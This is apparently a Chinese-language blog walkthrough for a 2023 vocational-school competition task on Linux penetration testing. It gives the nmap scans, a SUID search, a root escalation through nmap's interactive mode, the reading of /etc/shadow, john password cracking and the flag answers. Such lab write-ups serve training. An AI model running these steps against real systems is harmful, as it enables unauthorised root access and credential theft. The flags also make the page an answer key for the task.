2023年中职“网络安全“—Linux系统渗透提权③

2023年中职"网络安全"---Linux系统渗透提权③

  • Linux系统渗透提权
    • 任务环境说明:
      • [1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;](#1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;)
      • [2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;](#2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;)
      • [3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;](#3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;)
      • [4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;](#4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;)
      • [5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;](#5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;)
      • [6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。](#6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。)

Linux系统渗透提权

任务环境说明:

  • 服务器场景:Server2202(关闭链接)
  • 用户名:hacker密码:123456

1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

bash 复制代码
nmap -p- -sV -T4 -n 靶机IP
# -p- 全部端口
# -sV 版本探测
# -T4 针对TCP端口禁止动态扫描延迟超过10ms
# -n 不做DNS解析

flag: 22/tcp

2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

bash 复制代码
uname -a            # 输出操作系统信息

flag: Kiowizity

3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

bash 复制代码
uname -a            # 输出操作系统信息

flag: 3.13.0-45-generic

4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

bash 复制代码
ls /root
cat /root/adftutij.txt

flag: hyjufk983

5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

bash 复制代码
find / -perm -u=s -type f 2>/dev/null
# find 查找命令
# / 从根目录开始
# -perm 查找权限
# -u=s 有suid权限的文件
# -type 文件类型
# -f 普通文件
# 2 标准错误输出
# > 输
# /dev/null 空设备文件
bash 复制代码
nmap --interactive        # 进入nmap交互模式
!sh                       # 执行sh
id                        # 查看id
cat /etc/shadow           # shadow 文件保存密码
bash 复制代码
vim hash        # 把root信息行写入进去
cat hash        # 查看是否赋值成功
john hash       # 破解hash

flag: 0987654321

6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

bash 复制代码
pwd                                # 查看当前目录
copy /root/flag.jpg flag.jpg       # 复制过来
python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务
text 复制代码
注意一定要加:8080 指定HTTP端口

flag: 2022_year_Skill_competition

相关推荐
网硕互联的小客服4 小时前
Linux服务器磁盘应该如何合理分区?
linux·运维·服务器
楚识科技4 小时前
合同比对全流程自动化:OCR识别+差异比对+法律风险字段抽取实战指南
运维·自动化·ocr
Johny_Zhao4 小时前
FreeRADIUS + 华为AC/AP + 802.1X/WPA2-Enterprise 无线认证对接部署完整指南
网络·网络安全·信息安全·ldap·radius·huawei·系统运维·centos8
运行时异常4 小时前
【WMS 仓储系统集成 AI Agent 实战】第 8 讲(终篇):生产部署与并发安全——Semaphore 放进 Flux.defer 的坑,压测抓了一晚上
人工智能·安全
代码方舟4 小时前
零信任架构实战:基于天远人企关联构建自动化供应链金融网关
运维·人工智能·架构·自动化
虹科网络安全5 小时前
“顶会”看安全(十八):超越越狱:揭示由能力边界模糊引发的 LLM 应用安全风险
人工智能·安全
hasty5 小时前
OAuth 登录成功,不代表邮箱可信:Flarum 账号关联漏洞的安全编码启示
安全
贵沫末5 小时前
Ubuntu——常用软件安装
linux·运维·ubuntu
Doraemomo6 小时前
Linux内核驱动开发——中断与定时器
linux·运维·驱动开发
2301_808414386 小时前
Linux中动静态库的理解
linux·运维·服务器